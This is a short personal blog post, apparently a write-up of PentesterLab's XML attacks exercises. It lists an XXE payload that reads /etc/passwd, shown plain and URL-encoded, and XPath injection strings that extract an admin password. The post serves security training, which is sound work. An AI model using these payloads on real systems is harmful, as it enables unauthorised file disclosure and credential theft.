PentesterLab - XML attacks－Lung-Yu,Tsai 的部落格

Jan 24 Tue 2017 04:00
PentesterLab - XML attacks

Example 1

為OOXOXOX

<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>&xxe;

經過URL -encode

%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2ftest%3E

Example 2

name=' or 1=1]%00

hacker%27%20or%201=1]/parent::*/password%00

1	example2.php?name=admin%27]/parent::*/password%00

Lung-Yu,Tsai

Lung-Yu,Tsai 的部落格

Lung-Yu,Tsai 發表在痞客邦留言(0) 人氣()

E-mail轉寄

全站分類：進修深造
個人分類：Web Pentester
此分類上一篇： PentesterLab - Commands injection
此分類下一篇： PentesterLab - File Include (*Ex 2)
上一篇： PentesterLab - Commands injection
下一篇： Design Pattern - Singleton(單例模式)

▲top

留言列表

發表留言

文章搜尋

文章分類

Revit 二次開發 (2)

Security (2)

Program (14)

Machine Learing (16)

Infrastructure (5)

Software Engineering (2)

文章精選

所有文章列表

QR Code

誰來我家

參觀人氣

本日人氣：
累積人氣：

{{ article.user_name }}
{{ article.timestamp * 1000 | date:'MMM.dd.y.hh.mm' }}
{{ article.title }}
{{ article.content }}

我要留言

RSS訂閱

PIXNET Facebook Yahoo! Google MSN

您尚未登入，將以訪客身份留言。亦可以上方服務帳號登入留言

請輸入暱稱 ( 最多顯示 6 個中文字元 )

請輸入標題 ( 最多顯示 9 個中文字元 )

請輸入內容 ( 最多 140 個中文字元 )

請輸入左方認證碼：

看不懂,換張圖

請輸入驗證碼

Lung-Yu,Tsai 的部落格

Author Personal website

Tygr portfolio

Technology Record and Shared Space

PentesterLab - XML attacks

留言列表

文章搜尋

文章分類

Revit 二次開發 (2)

Security (2)

Program (14)

Machine Learing (16)

Infrastructure (5)

Software Engineering (2)

熱門文章

最新文章

文章精選

QR Code

最新留言

誰來我家

參觀人氣

RSS訂閱

Lung-Yu,Tsai 的部落格

Author Personal website Tygr portfolio Technology Record and Shared Space

PentesterLab - XML attacks

留言列表

文章搜尋

文章分類

Revit 二次開發 (2)

Security (2)

Program (14)

Machine Learing (16)

Infrastructure (5)

Software Engineering (2)

熱門文章

最新文章

文章精選

QR Code

最新留言

誰來我家

參觀人氣

RSS訂閱

Author Personal website

Tygr portfolio

Technology Record and Shared Space